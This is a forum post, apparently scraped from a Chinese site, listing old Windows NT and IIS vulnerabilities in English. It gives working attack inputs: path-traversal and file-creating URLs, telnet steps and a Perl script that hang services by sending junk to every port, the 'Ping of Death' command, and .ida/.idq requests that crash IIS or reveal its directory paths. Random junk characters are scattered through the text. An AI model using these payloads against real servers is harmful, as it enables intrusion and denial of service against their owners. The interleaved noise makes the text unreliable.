標(biāo)題: NT的漏洞及描述(英文) [打印本頁] 作者: 雜七雜八 時間: 2011-1-13 17:12 標(biāo)題: NT的漏洞及描述(英文) 受影響系統(tǒng):4.0,iis 1.0 " T2 X; Q' {, q7 dA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.% d7 j/ W: ^4 c' u1 R8 S5 d
! K2 `9 i8 ^5 N9 j `7 a
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script. 6 h& {! P( }6 ]/ Q. ~" n0 J2 e; Y0 m3 w3 c, w
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests. ) P0 b7 A4 l. }; y8 r7 W ) X% K+ ^' C$ C c* g-------------------------------------------------------------------- # X# O6 P O4 F! i- I. u0 e( B7 e0 r7 ]" v' o4 V; `
受影響系統(tǒng):4.0 : E: y, n. Q+ k; E/ BA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''. ; e# t* Q8 r$ B$ T; y& }& [ # @2 @' m6 [$ d/ hIf the file 'target.bat' exists, the file will be truncated. : v W$ g3 v. P. K. M# a% y# w0 l/ N+ k; B& S' A
# H G8 {$ X8 A3 YA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''. " E, n- |0 h3 ^- l7 ^! e! i' p; {) @0 _! |% r, u* R) a
---------------------------------------------------------------------- 8 |4 u! c0 ]7 o0 l7 B$ Y T7 T. q+ S/ a5 Q9 L
受影響系統(tǒng):3.51,4.0: G5 {) c/ s0 y1 W6 Q: c* A) p
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.5 D5 t! j }5 z6 s8 d g7 L6 X
6 o- |) w ^. l
The following steps;* [( A C% X1 l* V6 K' _3 Z3 l
/ U% c* k8 b/ D( yTelnet to an NT 4.0 system on port 135 % l1 O6 J: E! f$ HType about 10 characters followed by a <CR> 7 ~& Y+ A' ^! x( R2 w4 T$ J
Exit Telnet 3 V3 e( m0 y+ E) a i
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.% C# I$ g# o1 i
" U: P7 S; t& R( H- m% K
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted. ( n" `6 d: V, X) b* _ / ?4 a# J. T, X3 k; x/ }The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted. . F" z7 r1 z2 i% r, H; N6 e U J9 `$ x, Z4 [
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning. + Q/ U) ^: D! X1 ] p- i5 c5 v& a/ d" B* g
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit): 5 u* q0 p# i x/ P# h 9 }9 _+ l7 A; K: x' \2 ?/*begin poke code*/ 6 f# e4 D# n0 X3 g7 |1 k' x 9 g0 ~7 o/ n& @# P6 i) W% Ouse Socket; 2 T$ H5 c; F ]use FileHandle; * |- x2 e& Z' n$ Yrequire "chat2.pl";1 r' X h* |; Z7 Y# s2 k
; x( T( _/ M' Q" o+ T
$systemname = $ARGV[0] && shift; 8 v5 B. B) y" `* ?0 |/ l. E3 j( Y5 K" Q; r
$verbose = 1; # tell me what you're hitting 5 A! j0 q+ p ?3 o( f, B$knownports = 1; # don't hit known problem ports % y' C- Y: r7 b# S& Pfor ($port = $0; $port<65535; $port++) 6 c. L% L7 h6 i& O. H2 C
{ 0 v0 {: ]- I. y1 j! T & v7 e* e: @: z3 R1 I, B& N; ` M8 U4 v D
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {& W7 s& d% y- Z
next;7 h) H0 }; C4 b
}# q0 M- i* v0 F9 K$ }' d
$fh = chat::open_port($systemname, $port); : Z) v' O# i& B0 ~: C6 \# T7 Xchat::print ($fh,"This is about ten characters or more"); $ ]2 g% w: t( B' z8 L; M' {; hif ($verbose) {! C- ^& C ^+ Q1 k" I9 T
print "Trying port: $port\n"; 0 U' }- S, H- k} 6 n7 K O" N2 P, U; f
chat::close($fh);5 a# U3 \$ z4 c1 S
Z2 _3 c3 Y0 z& a8 q$ {* g# }}' y1 q+ v9 X5 g& ~: B1 X3 b; o* a
( v C+ o8 m# c+ M" G
% ?/ L% K2 W& S6 X
/*end poke code*/ 2 ]; E+ z# t. Z" T4 ]- @/ i! y( H! J9 j% m. M2 ?
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername9 g; D2 u9 Y7 ]- ?! f
5 X! W1 x) w- V" y+ @' Y7 E
--------------------------------------------------------------------------------6 J1 Y: R0 u( {
: ^- _; {6 N( ~1 C' R z" K
受影響系統(tǒng):4.0/ b! e; N7 o" t% T
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS. - w4 C6 J/ g2 z/ `# u " L- Y2 _8 f; D) U7 aThis attack causes Dr. Watson to display an alert window and to log an error: & a# X' ]) B- l. ^& O4 d4 Z; M
3 X1 C# L8 B2 [8 X6 B+ n"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"4 ]0 {% j9 i( e+ O4 v2 C
( i& a5 `- ^* f S8 {--------------------------------------------------------------------------------/ G; k6 L1 a) ]8 x) l5 S
) R/ _/ D3 G# M1 A$ Z
受影響系統(tǒng):3.51,4.0 9 J1 s: e- e& ^0 g: d0 sLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:" W. @* o. b, ~# W9 R
4 o: `3 l9 N* x' |
STOP: 0X0000001E 7 m% U; R) ?, q: |) H" fKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS: U! w4 o5 T- `! s
; \. ~. o) c) t2 w- S" P# HNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets. - F) f! [' g; J) [7 e. D5 k" C4 b
--------------------------------------------------------------------------------/ }" }, P W2 V4 J
" L% l/ k- h" j9 V1 V0 vMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 3 `8 V' {5 w) S. } a" f! X9 ^" I& I; Q7 U. O( [
-------------------------------------------------------- : _7 N' @# L7 [& |3 g- m' _' a. t$ e V+ X z' |* f& G1 _
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server